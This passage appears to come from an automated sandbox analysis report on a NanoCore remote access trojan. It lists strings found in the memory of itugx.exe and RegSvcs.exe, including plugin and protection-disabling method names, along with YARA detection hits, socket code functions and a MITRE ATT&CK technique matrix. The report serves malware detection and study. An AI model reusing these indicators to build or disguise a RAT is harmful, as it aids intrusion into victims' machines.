deDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: RegSvcs.exe, 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00392163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00392163
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00391B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_00391B61

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      2
      Valid Accounts      		111
      Scripting      		1
      DLL Side-Loading      		1
      Exploitation for Privilege Escalation      		11
      Disable or Modify Tools      		31
      Input Capture      		2
      System Time Discovery      		Remote Services11
      Archive Collected Data      		Exfiltration Over Other Network Medium1
      Ingress Tool Transfer      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts1
      Native API      		2
      Valid Accounts      		1
      DLL Side-Loading      		11
      Deobfuscate/Decode Files or Information      		LSASS Memory1
      Account Discovery      		Remote Desktop Protocol31
      Input Capture      		Exfiltration Over Bluetooth1
      Encrypted Channel      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts2
      Command and Scripting Interpreter      		1
      Scheduled Task/Job      		2
      Valid Accounts      		111
      Scripting      		Security Account Manager4
      File and Directory Discovery      		SMB/Windows Admin Shares2
      Clipboard Data      		Automated Exfiltration1
      Non-Standard Port      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts1
      Scheduled Task/Job      		21
      Registry Run Keys / Startup Folder      		21
      Access Token Manipulation      		12
      Obfuscated Files or Information      		NTDS36
      System Information Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer1
      Data Encoding      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon Script312
      Process Injection      		12
      Software Packing      		LSA Secrets341
      Security Software Discovery      		SSHKeyloggingData Transfer Size Limits1
      Remote Access Software      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.common1
      Scheduled Task/Job      		1
      DLL Side-Loading      		Cached Domain Credentials121
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureExfiltration Over C2 Channel1
      Non-Application Layer Protocol      		Jamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup Items21
      Registry Run Keys / Startup Folder      		12
      Masquerading      		DCSync2
      Process Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative Protocol21
      Application Layer Protocol      		Rogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
      Valid Accounts      		Proc Filesystem11
      Application Window Discovery      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)121
      Virtualization/Sandbox Evasion      		/etc/passwd and /etc/shadow1
      System Owner/User Discovery      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)21
      Access Token Manipulation      		Network Sniffing1
      Remote System Discovery      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron312
      Process Injection      		Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
      Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
      Hidden Files and Directories      		KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
